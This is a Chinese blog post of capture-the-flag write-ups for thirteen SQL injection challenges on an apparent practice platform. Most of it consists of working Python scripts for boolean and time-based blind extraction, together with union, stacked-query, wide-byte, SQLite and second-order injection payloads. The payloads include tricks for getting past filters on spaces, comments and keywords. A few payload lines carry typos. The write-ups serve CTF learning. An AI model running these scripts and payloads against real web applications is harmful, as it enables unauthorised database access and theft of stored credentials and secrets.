青岑有关WEB的WP(二)
本文最后更新于48 天前,其中的信息可能已经过时,如有错误请发送邮件到2407238516@qq.com

EZSQL-1WP(布尔型盲注)

这是道登录界面,有用户名和密码输入正确才能登录成功,但可想而知,题目可没有那么简单。

通过burp抓包后,在password=1参数后面加上payload。‘ 或 1–+ 发送请求后,响应回页面的是Welcome admin。但没有显示任何数据,猜想可能是布尔型盲注,那么以下通过脚本爆破出flag。

import requests
import time

url = "http://docker.qingcen.net:43393/?username=admin&password=1' or "
flag = ''
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0',
    'referer': 'http://docker.qingcen.net:43393/',
}

for i in range(1, 100):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        # 爆数据库名
        # payload = f"ascii(mid(database(),{i},1))>{mid}--+"
        # 爆表名
        # payload = f"ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid}--+"
        # 爆字段名
        # payload = f"ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='flag'),{i},1))>{mid}--+"
        # 爆数据
        # payload = f'ascii(mid((select group_concat(secret) from flag),{i},1))>{mid}--+'
        r = requests.post(url + payload, headers, verify=False)
        
        if 'Welcome admin' in r.text:
            low = mid + 1
        else:
            high = mid
        
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    
    flag += chr(mid)
    print("当前结果:", flag)

print("\n最终结果:", flag)

EZSQL-2WP(布尔型盲注)

界面和第一道一样,那么通过burp抓包试一下。

通过抓包进行修改参数,我发现本题过滤了空格以及–+注释。

空格和–+不能用了,可以通过/**/绕过空格,以及%23绕过sql注释;以下脚本爆破flag。

# 空格替换/**/
# 注释 %23
import requests
import time

url = "http://docker.qingcen.net:43412/?username=admin&password=1'/**/or/**/"
flag = ''
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0',
    'referer': 'http://docker.qingcen.net:43393/',
}

for i in range(1, 100):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        # 爆数据库名
        # payload = f"ascii(mid(database(),{i},1))>{mid}%23"
        # 爆表名
        # payload = f"ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{i},1))>{mid}%23"
        # 爆字段名
        # payload = f"ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167),{i},1))>{mid}%23"
        # 爆数据
        # payload = f'ascii(mid((select/**/group_concat(secret)/**/from/**/flag),{i},1))>{mid}%23'
        r = requests.post(url + payload, headers, verify=False)
        
        if 'Welcome admin' in r.text:
            low = mid + 1
        else:
            high = mid
        
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    
    flag += chr(mid)
    print("当前结果:", flag)

print("\n最终结果:", flag)

EZSQL-3WP(布尔型盲注)

直接爆题,被过滤了or、union、select,双写大小写均可:oorr、oORr;其他与EZSQL-2同样过滤了空格和–+,通过以下脚本爆破flag。

import requests
import time

url = "http://docker.qingcen.net:43603/?username=admin&password=1'/**/oORr/**/"
flag = ''
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0',
    'referer': 'http://docker.qingcen.net:43393/',
}

for i in range(1, 100):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        # 爆数据库名
        # payload = f"ascii(mid(database(),{i},1))>{mid}%23"
        # 爆表名
        # payload = f"ascii(mid((selSELECTect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{i},1))>{mid}%23"
        # 爆字段名
        # payload = f"ascii(mid((selSELECTect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167),{i},1))>{mid}%23"
        # 爆数据
        # payload = f"ascii(mid((selSELECTect/**/group_concat(secret)/**/from/**/flag),{i},1))>{mid}%23"
        r = requests.post(url + payload, headers, verify=False)
        
        if 'Welcome admin' in r.text:
            low = mid + 1
        else:
            high = mid
        
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    
    flag += chr(mid)
    print("当前结果:", flag)

print("\n最终结果:", flag)

EZSQL-4WP(联合注入)

页面是一个员工查询界面,输入员工编号可以查询到信息。

查询id为1,输出包含id、name、department、salary信息。

-- 测试是否有sql注入
id=1' or 1=1%23

-- 爆当前数据库
id=1' union select 1,database(),3,4%23

-- 爆表
id=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4%23

-- 爆字段
id=1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),3,4%23

-- 爆flag
id=1' union select 1,(select flag from flag),3,4%23

EZSQL-5WP(堆叠注入)

网站还是一个员工查询界面,通过员工id查询信息,和上题一致先payload一下。

-- 上题payload
id=1' union select 1,2,3,4%23

出现Illegal SQL injection提示,被过滤了select,这里可知上题的两张表名,通过修改表名显示内容。

-- 已知上题 表名为 flag
'; PREPARE stmt FROM CONCAT('SEL', 'ECT * FROM flag'); EXECUTE stmt; --+ 

利用prepare 将字符串当做sql语句执行,拼接字符串,通过execute 执行编译好的。

EZSQL-6WP(布尔型盲注)

网页是一个输入用户名和密码的登录界面,那么直接脚本爆破。

import requests
import time

url = "http://docker.qingcen.net:44859/?username=admin&password=1' or "
flag = ''

for i in range(1, 100):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        # 爆数据库名
        # payload = f"ascii(mid(database(),{i},1))>{mid}%23"
        # 爆表名
        # payload = f"ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{i},1))>{mid}%23"
        # 爆字段名
        # payload = f"ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167),{i},1))>{mid}%23"
        # 爆数据
        # payload = f"ascii(mid((select/**/group_concat(flag)/**/from/**/flag),{i},1))>{mid}%23"
        r = requests.post(url + payload)
        
        if 'Login successful.' in r.text:
            low = mid + 1
        else:
            high = mid
        
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    
    flag += chr(mid)
    print("当前结果:", flag)

print("\n最终结果:", flag)

EZSQL-7WP(布尔型盲注)

查询id为1的员工,发现只显示查询成功返回的内容,那么确定是布尔盲注,通过以下脚本flag爆破。

import requests
import time

url = "http://docker.qingcen.net:45814/?id=-1' or "
flag = ''

for i in range(1, 100):
    time.sleep(0.06)
    low = 32
    high = 128
    mid = (low + high) // 2

    while low < high:
        # 爆数据库名
        # payload = f"ascii(mid(database(),{i},1))>{mid}%23"
        # 爆表名
        # payload = f"ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{i},1))>{mid}%23"
        # 爆字段名
        # payload = f"ascii(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167),{i},1))>{mid}%23"
        # 爆数据
        # payload = f"ascii(mid((select/**/group_concat(flag)/**/from/**/flag),{i},1))>{mid}%23"
        r = requests.post(url + payload)
        
        if '查询成功' in r.text:
            low = mid + 1
        else:
            high = mid
        
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    
    flag += chr(mid)
    print("当前结果:", flag)

print("\n最终结果:", flag)

EZSQL-8WP(布尔型盲注)

查询后的数据无论对错,只显示文本内容,判断是一个无回显sql注入,通过时间型盲注,以下是时间型盲注脚本。

import requests
import time

url = "http://docker.qingcen.net:32956/"
result = ""

for i in range(1, 100):
    low = 32
    high = 127
    while low < high:
        mid = (low + high) // 2

        # 爆数据库
        # payload = f"' OR IF(ASCII(SUBSTR(DATABASE(),{i},1))>{mid}, SLEEP(3), 0)#"
        # 爆表名
        # payload = f"' OR IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(table_name) from information_schema.tables where table_schema=DATABASE()),{i},1))>{mid}, SLEEP(3), 0)#"
        # 爆字段
        # payload = f"' OR IF(ASCII(SUBSTR((SELECT GROUP_CONCAT(column_name) from information_schema.columns where table_schema=DATABASE() AND table_name='flag'),{i},1))>{mid}, SLEEP(3), 0)#"
        # 爆值
        # payload = f"' OR IF(ASCII(SUBSTR((SELECT flag from flag),{i},1))>{mid}, SLEEP(3), 0)#"

        try:
            start = time.time()
            requests.get(url, params={"id": payload}, timeout=10)
            end = time.time()

            if end - start > 2.5:
                low = mid + 1
            else:
                high = mid
        except:
            time.sleep(0.5)
            continue

    if low <= 32:
        break

    result += chr(low)
    print(result)

EZSQL-9WP(宽字节注入)

本题被过滤了引号,都会在前面加入\转换,可以通过%df绕过,解析成汉字,从而绕过。在username后修改成sql注入,password随意。

-- 测试哪个字段可以使用
%df' union select 1,2,3,4--

-- 爆表名
%df' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4--

-- 爆字段名
%df' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name=0x666c6167--

-- 爆值
%df' union select 1,group_concat(id,name,passwd,secret),3,4 from flag--

EZSQL-10WP(sqlite3联合注入)

‘ or 1=1#注入后报错了 Warning: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: “#” in/var/www/html/index.phpon line38。sqlite数据库的注释是两个减号 —

-- 爆表和列名
 ?username=admin' UNION SELECT 1,sql,3,4 FROM sqlite_master WHERE type='table'-- 
-- 爆flag ?username=admin' union select 1,group_concat(id||name||passwd||secret),3,4 from flag--

sqlite3是一个轻量级关系数据库,union select 同 MySQL数据库语句查询一致,但group_concat函数只查secret字段查询不到flag。

EZSQL-11WP(sqlite3布尔型盲注)

该页面只显示查询成功和未找到员工信息,那么无论输入的结果只会显示其中一个,猜测是布尔型盲注,通过python脚本进行爆破。

import requests
import time

url = "http://docker.qingcen.net:34061/"
result = ""

for i in range(1, 100):
    low = 32
    high = 126
    while low < high:
        mid = (low + high) // 2

        # 1. 爆表名
        # payload = f"' OR unicode(substr((SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table'),{i},1)) > {mid} -- "

        # 2. 爆字段名
        # payload = f"' OR unicode(substr((SELECT sql FROM sqlite_master WHERE name='flag'),{i},1)) > {mid} -- "

        # 3. 爆flag(最终)
        # payload = f"' OR unicode(substr((SELECT flag FROM flag limit 1),{i},1)) > {mid} -- "


        params = {"id": payload}

        try:
            res = requests.get(url, params=params, timeout=5)
            # 条件成立 = 字符更大
            if "查询成功" in res.text:
                low = mid + 1
            else:
                high = mid
        except:
            time.sleep(0.5)

    # 拿到正确字符
    char = chr(low)
    result += char
    print(f"第{i}位: {char} | 当前结果: {result}")

    # 遇到结束符停止
    if low == 32:
        break

EZSQL-12WP(二次注入)

界面只有两个,一个登录页面另一个注册页面。先注册admin’#用户名,密码为123456,这种恶意的账号在数据库存储了。当登录成功后发现admin的账号,在后端MySQL查询大概可能是SELECT  *  FROM users  WHERE username=’admin’#’ AND password=’123456′

EZSQL-13WP(二次注入/联合注入)

与EZSQL-12一致,先注册一个账号admin’#,结果为:Welcome admin. Your secret note is empty.

-- 注册后,笔记中内容返回的:您还没有私密笔记。
1.  ' order by 2# 
-- 注册后,笔记中内容返回的:查询异常:Unknown column &#039;3&#039; in &#039;ORDER BY&#039;
2. ' order by 3# 
-- 注册后,笔记中内容返回的:显示 2
3. ' union select 1,2# 
-- 注册后,笔记中内容返回的:显示 user
4. ' union select 1,database()# 
-- 注册后,笔记中内容返回的:显示 user_notes,users,flags
5. ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# 
-- 注册后,笔记中内容返回的: 显示 flag
6. ' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name ='flags'# 
-- 注册后,笔记中内容返回的:显示 flag值
7. ' unioon select 1,flag from flags# 
mrkuku-lazy
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇